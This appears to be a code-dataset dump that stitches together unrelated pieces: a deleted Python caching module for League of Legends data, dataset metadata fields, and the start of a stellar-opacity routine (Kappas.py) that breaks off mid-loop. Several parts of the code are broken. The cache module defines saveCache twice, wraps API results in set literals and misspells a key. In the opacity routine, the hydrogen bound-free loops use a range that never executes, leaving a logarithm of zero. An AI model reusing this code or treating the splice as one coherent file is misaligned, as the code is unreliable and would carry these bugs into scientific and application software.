-NEWS_TOLERANCE = 15 #2.5 min
-STREAMER_TOLERANCE = 1800000 #30 min
-SUMMONER_TOLERANCE = 3600000 #1 hour
-
-
-#used for setupDatabase
-def saveCache(saveData):
- saveFile = open("cacheDatabase.json","w")
- json.dump(saveData,saveFile)
- saveFile.close()
-
-def saveCache():
- saveFile = open("cacheDatabase.json","w")
- json.dump(cacheData,saveFile)
- saveFile.close()
-
-#used for starting a database from scratch
-#this will reset the database
-def setupDatabase():
- initData = {}
- initData["champions"] = {riot.get_all_champions()}
- initData["news"] = {allSubmissions}
- initData["summoners"] = {}
- initData["streamers"] = {twitch.getGameStreams("League of Legends")}
- saveCache(initData)
-
-#update methods take what is requested to update, and the new information for it
-#adds timestamp information
-def updateChampion(name,info):
- if name in cacheData["champiions"]:
- cacheData["champions"][name]["time"] = time.time()
- cacheData["champions"][name]["info"] = info
- cacheData["champions"][name]["stale"] = False
- else:
- cacheData["champions"][name] = {}
- cacheData["champions"][name]["time"] = time.time()
- cacheData["champions"][name]["info"] = info
- cacheData["champions"][name]["stale"] = False
- saveCache()
-
-def updateNews(name,info):
- if name in cacheData["news"]:
- cacheData["news"][name]["time"] = time.time()
- cacheData["news"][name]["info"] = info
- cacheData["news"][name]["stale"] = False
- else:
- cacheData["news"][name] = {}
- cacheData["news"][name]["time"] = time.time()
- cacheData["news"][name]["info"] = info
- cacheData["news"][name]["stale"] = False
- saveCache()
-
-def updateStreamer(name,info):
- if name in cacheData["streamers"]:
- cacheData["streamers"][name]["time"] = time.time()
- cacheData["streamers"][name]["info"] = info
- cacheData["streamers"][name]["stale"] = False
- else:
- cacheData["streamers"][name] = {}
- cacheData["streamers"][name]["time"] = time.time()
- cacheData["streamers"][name]["info"] = info
- cacheData["streamers"][name]["stale"] = False
- saveCache()
-
-def updateSummoner(name,info):
- if name in cacheData["summoners"]:
- cacheData["summoners"][name]["time"] = time.time()
- cacheData["summoners"][name]["info"] = info
- cacheData["summoners"][name]["stale"] = False
- else:
- cacheData["summoners"][name] = {}
- cacheData["summoners"][name]["time"] = time.time()
- cacheData["summoners"][name]["info"] = info
- cacheData["summoners"][name]["stale"] = False
- saveCache()
-
-#get basic data
-#returns {} if no ifo exists, or if the data is marked as stale
-def getChampionInfo(name):
- if name in cacheData["champions"] and cacheData["champions"][name]["stale"] == False:
- return cacheData["champions"][name]["info"]
- else:
- return {}
-
-def getSummonerInfo(name):
- if name in cacheData["summoners"] and cacheData["summoners"][name]["stale"] == False:
- return cacheData["summoners"][name]["info"]
- else:
- return {}
-
-def getNewsInfo(name):
- if name in cacheData["news"] and cacheData["news"][name]["stale"] == False:
- return cacheData["news"][name]["info"]
- else:
- return {}
-
-def getStreamerInfo(name):
- if name in cacheData["streamers"] and cacheData["streamers"][name]["stale"] == False:
- return cacheData["streamers"][name]["info"]
- else:
- return {}
-
-
-#trim the database, mark items as stale
-def trimCache():
- prunableSummonerKeys = []
- prunableStreamerKeys = []
- prunableNewsKeys = []
- prunableChampionKeys = []
- #for each listing, check how old the data is
- #if the data is old, mark as stale and reset timestamp
- #if data is already stale, mark for deletion
- for name in cacheData["summoners"]:
- if time.time() - SUMMONER_TOLERANCE > cacheData["summoners"][name]["time"]:
- if cacheData["summoners"][name]["stale"] == False:
- cacheData["summoners"][name]["stale"] = True
- cacheData["summoners"][name]["time"] = time.time()
- else:
- prunableSummonerKeys.append(name)
- for name in cacheData["streamers"]:
- if time.time() - STREAMER_TOLERANCE > cacheData["streamers"][name]["time"]:
- if cacheData["streamers"][name]["stale"] == False:
- cacheData["streamers"][name]["stale"] = True
- cacheData["streamers"][name]["time"] = time.time()
- else:
- prunableStreamerKeys.append(name)
- for name in cacheData["news"]:
- if time.time() - NEWS_TOLERANCE > cacheData["news"][name]["time"]:
- if cacheData["news"][name]["stale"] == False:
- cacheData["news"][name]["stale"] = True
- cacheData["news"][name]["time"] = time.time()
- else:
- prunableNewsKeys.append(name)
- for name in cacheData["champions"]:
- if time.time() - CHAMPION_TOLERANCE > cacheData["champions"][name]["time"]:
- if cacheData["champions"][name]["stale"] == False:
- cacheData["champions"][name]["stale"] = True
- cacheData["champions"][name]["time"] = time.time()
- else:
- prunableChampionKeys.append(name)
- #delete the elements marked for deletion
- for pruner in prunableSummonerKeys:
- del cacheData["summoners"][pruner]
- for pruner in prunableStreamerKeys:
- del cacheData["streamers"][pruner]
- for pruner in prunableNewsKeys:
- del cacheData["news"][pruner]
- for pruner in prunableChampionKeys:
- del cacheData["champions"][pruner]
- saveCache()
-
-def test():
- updateStreamer("Emorelleum",{"url":"www.spleen.com","title":"Viktor epic fail"})
- updateNews("Blah", {"Art 1":"la"})
- saveCache()
-
-trimCache()
-#don't uncomment this unless you want to reset the database
-#setupDatabase()
|
mit
| 5,110,957,185,815,924,000
| 33.513228
| 87
| 0.687414
| false
| 2.756974
| false
| false
| false
|
sevenian3/ChromaStarPy
|
Kappas.py
|
1
|
33442
|
# -*- coding: utf-8 -*-
"""
Created on Mon Apr 24 17:12:02 2017
@author: ishort
"""
import math
import Planck
import Useful
def kappas2(numDeps, pe, zScale, temp, rho, numLams, lambdas, logAHe, \
logNH1, logNH2, logNHe1, logNHe2, Ne, teff, logKapFudge):
"""/* Compute opacities properly from scratch with real physical cross-sections
*/ // *** CAUTION:
//
// This return's "kappa" as defined by Gray 3rd Ed. - cm^2 per *relelvant particle* where the "releveant particle"
// depends on *which* kappa """
#//
#// *** CAUTION:
#//
#// This return's "kappa" as defined by Gray 3rd Ed. - cm^2 per *relelvant particle* where the "releveant particle"
#// depends on *which* kappa
log10E = math.log10(math.e) #//needed for g_ff
logLog10E = math.log(log10E)
logE10 = math.log(10.0)
logNH = [0.0 for i in range(numDeps)] #//Total H particle number density cm^-3
#double logPH1, logPH2, logPHe1, logPHe2;
for i in range(numDeps):
logNH[i] = math.exp(logNH1[i]) + math.exp(logNH2[i])
logNH[i] = math.log(logNH[i])
#//System.out.println("i " + i + " logNH1 " + log10E*logNH1[i] + " logNH2 " + log10E*logNH2[i]
#//+ " logNHe1 " + log10E*logNHe1[i] + " logNHe2 " + log10E*logNHe2[i] + " logPe " + log10E*pe[1][i]);
#// logPH1 = logNH1[i] + temp[1][i] + Useful.logK();
#// logPH2 = logNH2[i] + temp[1][i] + Useful.logK();
#// logPHe1 = logNHe1[i] + temp[1][i] + Useful.logK();
#// logPHe2 = logNHe2[i] + temp[1][i] + Useful.logK();
#//System.out.println("i " + i + " logPH1 " + log10E*logPH1 + " logPH2 " + log10E*logPH2
#//+ " logPHe1 " + log10E*logPHe1 + " logPHe2 " + log10E*logPHe2 + " logPe " + log10E*pe[1][i]);
#double[][] logKappa = new double[numLams][numDeps];
logKappa = [ [0.0 for i in range(numDeps)] for j in range(numLams) ]
#double kappa; //helper
#double stimEm; //temperature- and wavelength-dependent stimulated emission correction
#double stimHelp, logStimEm;
#double ii; //useful for converting integer loop counter, i, to float
#//
#//
#//Input data and variable declarations:
#//
#//
#// H I b-f & f-f
chiIH = 13.598433 #//eV
Rydberg = 1.0968e-2 #// "R" in nm^-1
#//Generate threshold wavelengths and b-f Gaunt (g_bf) helper factors up to n=10:
#double n; //principle quantum number of Bohr atom E-level
numHlevs = 10
#double logChiHlev;
invThresh = [0.0 for i in range(numHlevs)] #//also serves as g_bf helper factor
threshLambs = [0.0 for i in range(numHlevs)]
chiHlev = [0.0 for i in range(numHlevs)]
for i in range(numHlevs):
n = 1.0 + float(i)
invThresh[i] = Rydberg / n / n #//nm^-1; also serves as g_bf helper factor
threshLambs[i] = 1.0 / invThresh[i] #//nm
logChiHlev = Useful.logH() + Useful.logC() + math.log(invThresh[i]) + 7.0*logE10 #// ergs
chiHlev[i] = math.exp(logChiHlev - Useful.logEv()) #//eV
chiHlev[i] = chiIH - chiHlev[i]
#// System.out.println("i " + i + " n " + n + " invThresh " + invThresh[i] + " threshLambs[i] " + threshLambs[i] + " chiHlev " + chiHlev[i]);
logGauntPrefac = math.log(0.3456) - 0.333333*math.log(Rydberg)
#// **** Caution: this will require lamba in A!:
a0 = 1.0449e-26 #//if lambda in A
logA0 = math.log(a0)
#// Boltzmann const "k" in eV/K - needed for "theta"
logKeV = Useful.logK() - Useful.logEv()
#//g_bf Gaunt factor - depends on lower E-level, n:
loggbf = [0.0 for i in range(numHlevs)]
#//initialize quantities that depend on lowest E-level contributing to opacity at current wavelength:
for iThresh in range(numHlevs):
loggbf[iThresh] = 0.0
#double logGauntHelp, gauntHelp;
#double gbf, gbfHelp, loggbfHelp;
#double gff, gffHelp, loggffHelp, logffHelp, loggff;
#double help, logHelp3;
#double chiLambda, logChiLambda;
#double bfTerm, logbfTerm, bfSum, logKapH1bf, logKapH1ff;
#//initial defaults:
gbf = 1.0
gff = 1.0
loggff = 0.0
logChiFac = math.log(1.2398e3) #// eV per lambda, for lambda in nm
#// Needed for kappa_ff:
#double ffBracket;
logffHelp = logLog10E - math.log(chiIH) - math.log(2.0)
#//logHelp = logffHelp - math.log(2.0)
#//
#//Hminus:
#//
#// H^- b-f
#//This is for the sixth order polynomial fit to the cross-section's wavelength dependence
numHmTerms = 7
logAHm = [0.0 for i in range(numHmTerms)]
signAHm = [0.0 for i in range(numHmTerms)]
aHmbf = 4.158e-10
#//double logAHmbf = Math.log(aHmbf);
#//Is the factor of 10^-18cm^2 from the polynomial fit to alpha_Hmbf missing in Eq. 8.12 on p. 156 of Gray 3rd Ed??
logAHmbf = math.log(aHmbf) - 18.0*logE10
#double alphaHmbf, logAlphaHmbf, logTermHmbf, logKapHmbf;
#//Computing each polynomial term logarithmically
logAHm[0] = math.log(1.99654)
signAHm[0] = 1.0
logAHm[1] = math.log(1.18267e-5)
signAHm[1] = -1.0
logAHm[2] = math.log(2.64243e-6)
signAHm[2] = 1.0
logAHm[3] = math.log(4.40524e-10)
signAHm[3] = -1.0
logAHm[4] = math.log(3.23992e-14)
signAHm[4] = 1.0
logAHm[5] = math.log(1.39568e-18)
signAHm[5] = -1.0
logAHm[6] = math.log(2.78701e-23)
signAHm[6] = 1.0
alphaHmbf = math.exp(logAHm[0]) #//initialize accumulator
#// H^- f-f:
logAHmff = -26.0*logE10
numHmffTerms = 5
#double fPoly, logKapHmff, logLambdaAFac;
fHmTerms = [ [ 0.0 for i in range(numHmffTerms) ] for j in range(3) ]
fHm = [0.0 for i in range(3)]
fHmTerms[0][0] = -2.2763
fHmTerms[0][1] = -1.6850
fHmTerms[0][2] = 0.76661
fHmTerms[0][3] = -0.053346
fHmTerms[0][4] = 0.0
fHmTerms[1][0] = 15.2827
fHmTerms[1][1] = -9.2846
fHmTerms[1][2] = 1.99381
fHmTerms[1][3] = -0.142631
fHmTerms[1][4] = 0.0
fHmTerms[2][0] = -197.789
fHmTerms[2][1] = 190.266
fHmTerms[2][2] = -67.9775
fHmTerms[2][3] = 10.6913
fHmTerms[2][4] = -0.625151
#//
#//H_2^+ molecular opacity - cool stars
#// scasles with proton density (H^+)
#//This is for the third order polynomial fit to the "sigma_l(lambda)" and "U_l(lambda)"
#//terms in the cross-section
numH2pTerms = 4
sigmaH2pTerm = [0.0 for i in range(numH2pTerms)]
UH2pTerm = [0.0 for i in range(numH2pTerms)]
#double logSigmaH2p, sigmaH2p, UH2p, logKapH2p;
aH2p = 2.51e-42
logAH2p = math.log(aH2p)
sigmaH2pTerm[0] = -1040.54
sigmaH2pTerm[1] = 1345.71
sigmaH2pTerm[2] = -547.628
sigmaH2pTerm[3] = 71.9684
#//UH2pTerm[0] = 54.0532
#//UH2pTerm[1] = -32.713
#//UH2pTerm[2] = 6.6699
#//UH2pTerm[3] = -0.4574
#//Reverse signs on U_1 polynomial expansion co-efficients - Dave Gray private communcation
#//based on Bates (1952)
UH2pTerm[0] = -54.0532
UH2pTerm[1] = 32.713
UH2pTerm[2] = -6.6699
UH2pTerm[3] = 0.4574
#// He I b-f & ff:
#double totalH1Kap, logTotalH1Kap, helpHe, logKapHe;
#//
#//He^- f-f
AHe = math.exp(logAHe)
#double logKapHemff, nHe, logNHe, thisTerm, thisLogTerm, alphaHemff, log10AlphaHemff;
#// Gray does not have this pre-factor, but PHOENIX seems to and without it
#// the He opacity is about 10^26 too high!:
logAHemff = -26.0*logE10
numHemffTerms = 5
logC0HemffTerm = [0.0 for i in range(numHemffTerms)]
logC1HemffTerm = [0.0 for i in range(numHemffTerms)]
logC2HemffTerm = [0.0 for i in range(numHemffTerms)]
logC3HemffTerm = [0.0 for i in range(numHemffTerms)]
signC0HemffTerm = [0.0 for i in range(numHemffTerms)]
signC1HemffTerm = [0.0 for i in range(numHemffTerms)]
signC2HemffTerm = [0.0 for i in range(numHemffTerms)]
signC3HemffTerm = [0.0 for i in range(numHemffTerms)]
#//we'll be evaluating the polynominal in theta logarithmically by adding logarithmic terms -
logC0HemffTerm[0] = math.log(9.66736)
signC0HemffTerm[0] = 1.0
logC0HemffTerm[1] = math.log(71.76242)
signC0HemffTerm[1] = -1.0
logC0HemffTerm[2] = math.log(105.29576)
signC0HemffTerm[2] = 1.0
logC0HemffTerm[3] = math.log(56.49259)
signC0HemffTerm[3] = -1.0
logC0HemffTerm[4] = math.log(10.69206)
signC0HemffTerm[4] = 1.0
logC1HemffTerm[0] = math.log(10.50614)
signC1HemffTerm[0] = -1.0
logC1HemffTerm[1] = math.log(48.28802)
signC1HemffTerm[1] = 1.0
logC1HemffTerm[2] = math.log(70.43363)
signC1HemffTerm[2] = -1.0
logC1HemffTerm[3] = math.log(37.80099)
signC1HemffTerm[3] = 1.0
logC1HemffTerm[4] = math.log(7.15445)
signC1HemffTerm[4] = -1.0
logC2HemffTerm[0] = math.log(2.74020)
signC2HemffTerm[0] = 1.0
logC2HemffTerm[1] = math.log(10.62144)
signC2HemffTerm[1] = -1.0
logC2HemffTerm[2] = math.log(15.50518)
signC2HemffTerm[2] = 1.0
logC2HemffTerm[3] = math.log(8.33845)
signC2HemffTerm[3] = -1.0
logC2HemffTerm[4] = math.log(1.57960)
signC2HemffTerm[4] = 1.0
logC3HemffTerm[0] = math.log(0.19923)
signC3HemffTerm[0] = -1.0
logC3HemffTerm[1] = math.log(0.77485)
signC3HemffTerm[1] = 1.0
logC3HemffTerm[2] = math.log(1.13200)
signC3HemffTerm[2] = -1.0
logC3HemffTerm[3] = math.log(0.60994)
signC3HemffTerm[3] = 1.0
logC3HemffTerm[4] = math.log(0.11564)
signC3HemffTerm[4] = -1.0
# //initialize accumulators:
cHemff = [0.0 for i in range(4)]
cHemff[0] = signC0HemffTerm[0] * math.exp(logC0HemffTerm[0]);
cHemff[1] = signC1HemffTerm[0] * math.exp(logC1HemffTerm[0]);
cHemff[2] = signC2HemffTerm[0] * math.exp(logC2HemffTerm[0]);
cHemff[3] = signC3HemffTerm[0] * math.exp(logC3HemffTerm[0]);
#//
#//Should the polynomial expansion for the Cs by in 10g10Theta?? No! Doesn't help:
#//double[] C0HemffTerm = new double[numHemffTerms];
#//double[] C1HemffTerm = new double[numHemffTerms];
#//double[] C2HemffTerm = new double[numHemffTerms];
#//double[] C3HemffTerm = new double[numHemffTerms];
#//
#//C0HemffTerm[0] = 9.66736;
#//C0HemffTerm[1] = -71.76242;
#//C0HemffTerm[2] = 105.29576;
#//C0HemffTerm[3] = -56.49259;
#//C0HemffTerm[4] = 10.69206;
#//C1HemffTerm[0] = -10.50614;
#//C1HemffTerm[1] = 48.28802;
#//C1HemffTerm[2] = -70.43363;
#//C1HemffTerm[3] = 37.80099;
#//C1HemffTerm[4] = -7.15445;
#//C2HemffTerm[0] = 2.74020;
#//C2HemffTerm[1] = -10.62144;
#//C2HemffTerm[2] = 15.50518;
#//C2HemffTerm[3] = -8.33845;
#//C2HemffTerm[4] = 1.57960;
#//C3HemffTerm[0] = -0.19923;
#//C3HemffTerm[1] = 0.77485;
#//C3HemffTerm[2] = -1.13200;
#//C3HemffTerm[3] = 0.60994;
#//C3HemffTerm[4] = -0.11564;
#//initialize accumulators:
#// double[] cHemff = new double[4];
#// cHemff[0] = C0HemffTerm[0];
#// cHemff[1] = C1HemffTerm[0];
#// cHemff[2] = C2HemffTerm[0];
#// cHemff[3] = C3HemffTerm[0];
#//
#// electron (e^-1) scattering (Thomson scattering)
#double kapE, logKapE;
alphaE = 0.6648e-24 #//cm^2/e^-1
logAlphaE = math.log(0.6648e-24)
#//Universal:
#//
# double theta, logTheta, log10Theta, log10ThetaFac;
# double logLambda, lambdaA, logLambdaA, log10LambdaA, lambdanm, logLambdanm;
#//Okay - here we go:
#//Make the wavelength loop the outer loop - lots of depth-independnet lambda-dependent quantities:
#//
#//
# //System.out.println("Kappas called...");
#//
#// **** START WAVELENGTH LOOP iLam
#//
#//
#//
for iLam in range(numLams):
#//
#//Re-initialize all accumulators to be on safe side:
kappa = 0.0
logKapH1bf = -99.0
logKapH1ff = -99.0
logKapHmbf = -99.0
logKapHmff = -99.0
logKapH2p = -99.0
logKapHe = -99.0
logKapHemff = -99.0
logKapE = -99.0
#//
#//*** CAUTION: lambda MUST be in nm here for consistency with Rydbeg
logLambda = math.log(lambdas[iLam]) #//log cm
lambdanm = 1.0e7 * lambdas[iLam]
logLambdanm = math.log(lambdanm)
lambdaA = 1.0e8 * lambdas[iLam] #//Angstroms
logLambdaA = math.log(lambdaA)
log10LambdaA = log10E * logLambdaA
logChiLambda = logChiFac - logLambdanm
chiLambda = math.exp(logChiLambda) #//eV
#// Needed for both g_bf AND g_ff:
logGauntHelp = logGauntPrefac - 0.333333*logLambdanm #//lambda in nm here
gauntHelp = math.exp(logGauntHelp)
#// if (iLam == 142){
#// System.out.println("lambdaA " + lambdaA);
#// }
#//HI b-f depth independent factors:
#//Start at largest threshold wavelength and break out of loop when next threshold lambda is less than current lambda:
#for (iThresh = numHlevs-1; iThresh >= 0; iThresh--){
for iThresh in range(0, numHlevs-1, -1):
if (threshLambs[iThresh] < lambdanm):
break
if (lambdanm <= threshLambs[iThresh]):
#//this E-level contributes
loggbfHelp = logLambdanm + math.log(invThresh[iThresh]) # //lambda in nm here; invThresh here as R/n^2
gbfHelp = math.exp(loggbfHelp)
gbf = 1.0 - (gauntHelp * (gbfHelp - 0.5))
#// if (iLam == 1){}
#// System.out.println("iThresh " + iThresh + " threshLambs " + threshLambs[iThresh] + " gbf " + gbf);
#// }
loggbf[iThresh] = math.log(gbf)
#//end iThresh loop
#//HI f-f depth independent factors:
# //logChi = logLog10E + logLambdanm - logChiFac; //lambda in nm here
# //chi = Math.exp(logChi);
loggffHelp = logLog10E - logChiLambda
#//
#//
#//
#// ****** Start depth loop iTau ******
#//
#//
#//
#//
for iTau in range(numDeps):
#//
# //Re-initialize all accumulators to be on safe side:
kappa = 0.0
logKapH1bf = -99.0
logKapH1ff = -99.0
logKapHmbf = -99.0
logKapHmff = -99.0
logKapH2p = -99.0
logKapHe = -99.0
logKapHemff = -99.0
logKapE = -99.0
#//
#//
#//if (iTau == 36 && iLam == 142){
#// System.out.println("lambdanm[142] " + lambdanm + " temp[0][iTau=36] " + temp[0][iTau=36]);
#// }
#//This is "theta" ~ 5040/T:
logTheta = logLog10E - logKeV - temp[1][iTau]
log10Theta = log10E * logTheta
theta = math.exp(logTheta)
#//System.out.println("theta " + theta + " logTheta " + logTheta);
#// temperature- and wavelength-dependent stimulated emission coefficient:
stimHelp = -1.0 * theta * chiLambda * logE10
stimEm = 1.0 - math.exp(stimHelp)
logStimEm = math.log(stimEm)
# // if (iTau == 36 && iLam == 142){
# // System.out.println("stimEm " + stimEm);
# //}
ffBracket = math.exp(loggffHelp - logTheta) + 0.5
gff = 1.0 + (gauntHelp*ffBracket)
#//if (iTau == 36 && iLam == 1){
#// System.out.println("gff " + gff);
#// }
loggff = math.log(gff)
#//H I b-f:
#//Start at largest threshold wavelength and break out of loop when next threshold lambda is less than current lambda:
bfSum = 0.0 #//initialize accumulator
logHelp3 = logA0 + 3.0*logLambdaA #//lambda in A here
#for (int iThresh = numHlevs-1; iThresh >= 0; iThresh--){
for iThresh in range(0, numHlevs-1, -1):
if (threshLambs[iThresh] < lambdanm):
break
n = 1.0 + float(iThresh)
if (lambdanm <= threshLambs[iThresh]):
#//this E-level contributes
logbfTerm = loggbf[iThresh] - 3.0*math.log(n)
logbfTerm = logbfTerm - (theta*chiHlev[iThresh])*logE10
bfSum = bfSum + math.exp(logbfTerm)
#//if (iTau == 36 && iLam == 142){
# //System.out.println("lambdanm " + lambdanm + " iThresh " + iThresh + " threshLambs[iThresh] " + threshLambs[iThresh]);
# //System.out.println("loggbf " + loggbf[iThresh] + " theta " + theta + " chiHlev " + chiHlev[iThresh]);
# //System.out.println("bfSum " + bfSum + " logbfTerm " + logbfTerm);
#// }
#//end iThresh loop
#// cm^2 per *neutral* H atom
logKapH1bf = logHelp3 + math.log(bfSum)
#//Stimulated emission correction
logKapH1bf = logKapH1bf + logStimEm
#//System.out.println("lambda " + lambdas[iLam] + "iTau " + iTau + " sigma " + Math.exp(logKapH1bf));
#//Add it in to total - opacity per neutral HI atom, so multiply by logNH1
#// This is now linear opacity in cm^-1
logKapH1bf = logKapH1bf + logNH1[iTau]
#//System.out.println(" aH1 " + Math.exp(logKapH1bf));
#////Nasty fix to make Balmer lines show up in A0 stars!
#// if (teff > 8000){
#// logKapH1bf = logKapH1bf - logE10*1.5;
#//
kappa = math.exp(logKapH1bf)
#//System.out.println("HIbf " + log10E*logKapH1bf);
#//if (iTau == 36 && iLam == 142){
#// System.out.println("lambdaA " + lambdaA + " logKapH1bf " + log10E*(logKapH1bf)); //-rho[1][iTau]));
#//}
#//H I f-f:
#// cm^2 per *neutral* H atom
logKapH1ff = logHelp3 + loggff + logffHelp - logTheta - (theta*chiIH)*logE10
#//Stimulated emission correction
logKapH1ff = logKapH1ff + logStimEm
#//Add it in to total - opacity per neutral HI atom, so multiply by logNH1
#// This is now linear opacity in cm^-1
logKapH1ff = logKapH1ff + logNH1[iTau]
#////Nasty fix to make Balmer lines show up in A0 stars!
#// if (teff > 8000){
#// logKapH1ff = logKapH1ff - logE10*1.5;
#//
kappa = kappa + math.exp(logKapH1ff);
#//System.out.println("HIff " + log10E*logKapH1ff);
#//if (iTau == 36 && iLam == 142){
#// System.out.println("logKapH1ff " + log10E*(logKapH1ff)); //-rho[1][iTau]));
#//}
#//
#//Hminus:
#//
#// H^- b-f:
#//if (iTau == 36 && iLam == 142){
# // System.out.println("temp " + temp[0][iTau] + " lambdanm " + lambdanm);
# // }
logKapHmbf = -99.0 #//initialize default
#//if ( (temp[0][iTau] > 2500.0) && (temp[0][iTau] < 10000.0) ){
#//if ( (temp[0][iTau] > 2500.0) && (temp[0][iTau] < 8000.0) ){
#//Try lowering lower Teff limit to avoid oapcity collapse in outer layers of late-type stars
if ( (temp[0][iTau] > 1000.0) and (temp[0][iTau] < 10000.0) ):
if ((lambdanm > 225.0) and (lambdanm < 1500.0) ): # //nm
#//if (iTau == 36 && iLam == 142){
# // System.out.println("In KapHmbf condition...");
#//}
ii = 0.0
alphaHmbf = signAHm[0]*math.exp(logAHm[0]) #//initialize accumulator
#for (int i = 1; i < numHmTerms; i++){
for i in range(1, numHmTerms):
ii = float(i)
#//if (iTau == 36 && iLam == 142){
#// System.out.println("ii " + ii);
#//}
logTermHmbf = logAHm[i] + ii*logLambdaA
alphaHmbf = alphaHmbf + signAHm[i]*math.exp(logTermHmbf)
#//if (iTau == 36 && iLam == 142){
#// System.out.println("logTermHmbf " + log10E*logTermHmbf + " i " + i + " logAHm " + log10E*logAHm[i]);
#//}
logAlphaHmbf = math.log(alphaHmbf)
#// cm^2 per neutral H atom
logKapHmbf = logAHmbf + logAlphaHmbf + pe[1][iTau] + 2.5*logTheta + (0.754*theta)*logE10
#//Stimulated emission correction
logKapHmbf = logKapHmbf + logStimEm
#//if (iTau == 36 && iLam == 142){
#// System.out.println("alphaHmbf " + alphaHmbf);
#// System.out.println("logKapHmbf " + log10E*logKapHmbf + " logAHmbf " + log10E*logAHmbf + " logAlphaHmbf " + log10E*logAlphaHmbf);
#// }
#//Add it in to total - opacity per neutral HI atom, so multiply by logNH1
#// This is now linear opacity in cm^-1
logKapHmbf = logKapHmbf + logNH1[iTau]
kappa = kappa + math.exp(logKapHmbf)
#//System.out.println("Hmbf " + log10E*logKapHmbf);
#//if (iTau == 36 && iLam == 142){
#// System.out.println("logKapHmbf " + log10E*(logKapHmbf)); //-rho[1][iTau]));
#//}
#//wavelength condition
#// temperature condition
#// H^- f-f:
logKapHmff = -99.0 #//initialize default
#//if ( (temp[0][iTau] > 2500.0) && (temp[0][iTau] < 10000.0) ){
#//Try lowering lower Teff limit to avoid oapcity collapse in outer layers of late-type stars
#//if ( (temp[0][iTau] > 2500.0) && (temp[0][iTau] < 8000.0) ){
if ( (temp[0][iTau] > 1000.0) and (temp[0][iTau] < 10000.0) ):
if ((lambdanm > 260.0) and (lambdanm < 11390.0) ): #//nm
#//construct "f_n" polynomials in log(lambda)
for j in range(3):
fHm[j] = fHmTerms[j][0] #//initialize accumulators
ii = 0.0
for i in range(1, numHmffTerms):
ii = float(i)
logLambdaAFac = math.pow(log10LambdaA, ii)
for j in range(3):
fHm[j] = fHm[j] + (fHmTerms[j][i]*logLambdaAFac)
#} #// i
#} #// j
#//
fPoly = fHm[0] + fHm[1]*log10Theta + fHm[2]*log10Theta*log10Theta
#// In cm^2 per neutral H atom:
#// Stimulated emission alreadya ccounted for
logKapHmff = logAHmff + pe[1][iTau] + fPoly*logE10
#//Add it in to total - opacity per neutral HI atom, so multiply by logNH1
#// This is now linear opacity in cm^-1
logKapHmff = logKapHmff + logNH1[iTau]
kappa = kappa + math.exp(logKapHmff)
#//System.out.println("Hmff " + log10E*logKapHmff);
#//if (iTau == 36 && iLam == 142){
#// System.out.println("logKapHmff " + log10E*(logKapHmff)); //-rho[1][iTau]));
#//}
#//wavelength condition
#// temperature condition
#// H^+_2:
#//
logKapH2p = -99.0 #//initialize default
if ( temp[0][iTau] < 4000.0 ):
if ((lambdanm > 380.0) and (lambdanm < 2500.0) ): # //nm
sigmaH2p = sigmaH2pTerm[0] #//initialize accumulator
UH2p = UH2pTerm[0] #//initialize accumulator
ii = 0.0#
for i in range(1, numH2pTerms):
ii = float(i)
logLambdaAFac = math.pow(log10LambdaA, ii)
#// kapH2p way too large with lambda in A - try cm: No! - leads to negative logs
#//logLambdaAFac = Math.pow(logLambda, ii);
sigmaH2p = sigmaH2p + sigmaH2pTerm[i] * logLambdaAFac
UH2p = UH2p + UH2pTerm[i] * logLambdaAFac
logSigmaH2p = math.log(sigmaH2p)
logKapH2p = logAH2p + logSigmaH2p - (UH2p*theta)*logE10 + logNH2[iTau]
#//Stimulated emission correction
logKapH2p = logKapH2p + logStimEm
#//Add it in to total - opacity per neutral HI atom, so multiply by logNH1
#// This is now linear opacity in cm^-1
logKapH2p = logKapH2p + logNH1[iTau]
kappa = kappa + math.exp(logKapH2p)
#//System.out.println("H2p " + log10E*logKapH2p);
#//if (iTau == 16 && iLam == 142){
# //System.out.println("logKapH2p " + log10E*(logKapH2p-rho[1][iTau]) + " logAH2p " + log10E*logAH2p
#// + " logSigmaH2p " + log10E*logSigmaH2p + " (UH2p*theta)*logE10 " + log10E*((UH2p*theta)*logE10) + " logNH2[iTau] " + log10E*logNH2[iTau]);
#//}
#//wavelength condition
#// temperature condition
#//He I
#//
#// HeI b-f + f-f
#//Scale sum of He b-f and f-f with sum of HI b-f and f-f
#//wavelength condition comes from requirement that lower E level be greater than n=2 (edge at 22.78 nm)
logKapHe = -99.0 #//default intialization
if ( temp[0][iTau] > 10000.0 ):
if (lambdanm > 22.8): #//nm
totalH1Kap = math.exp(logKapH1bf) + math.exp(logKapH1ff)
logTotalH1Kap = math.log(totalH1Kap)
helpHe = Useful.k() * temp[0][iTau]
#// cm^2 per neutral H atom (after all, it's scaled wrt kappHI
#// Stimulated emission already accounted for
#//
#// *** CAUTION: Is this *really* the right thing to do???
#// - we're re-scaling the final H I kappa in cm^2/g corrected for stim em, NOT the raw cross section
logKapHe = math.log(4.0) - (10.92 / helpHe) + logTotalH1Kap
#//Add it in to total - opacity per neutral HI atom, so multiply by logNH1
#// This is now linear opacity in cm^-1
logKapHe = logKapHe + logNH1[iTau]
kappa = kappa + math.exp(logKapHe)
#//System.out.println("He " + log10E*logKapHe);
#//if (iTau == 36 && iLam == 142){
#// System.out.println("logKapHe " + log10E*(logKapHe)); //-rho[1][iTau]));
#//}
#//wavelength condition
#// temperature condition
#//
#//He^- f-f:
logKapHemff = -99.0 #//default initialization
if ( (theta > 0.5) and (theta < 2.0) ):
if ((lambdanm > 500.0) and (lambdanm < 15000.0) ):
#// initialize accumulators:
cHemff[0] = signC0HemffTerm[0]*math.exp(logC0HemffTerm[0]);
#//System.out.println("C0HemffTerm " + signC0HemffTerm[0]*Math.exp(logC0HemffTerm[0]));
cHemff[1] = signC1HemffTerm[0]*math.exp(logC1HemffTerm[0]);
#//System.out.println("C1HemffTerm " + signC1HemffTerm[0]*Math.exp(logC1HemffTerm[0]));
cHemff[2] = signC2HemffTerm[0]*math.exp(logC2HemffTerm[0]);
#//System.out.println("C2HemffTerm " + signC2HemffTerm[0]*Math.exp(logC2HemffTerm[0]));
cHemff[3] = signC3HemffTerm[0]*math.exp(logC3HemffTerm[0]);
#//System.out.println("C3HemffTerm " + signC3HemffTerm[0]*Math.exp(logC3HemffTerm[0]));
#//build the theta polynomial coefficients
ii = 0.0
for i in range(1, numHemffTerms):
ii = float(i)
thisLogTerm = ii*logTheta + logC0HemffTerm[i]
cHemff[0] = cHemff[0] + signC0HemffTerm[i]*math.exp(thisLogTerm)
#//System.out.println("i " + i + " ii " + ii + " C0HemffTerm " + signC0HemffTerm[i]*Math.exp(logC0HemffTerm[i]));
thisLogTerm = ii*logTheta + logC1HemffTerm[i]
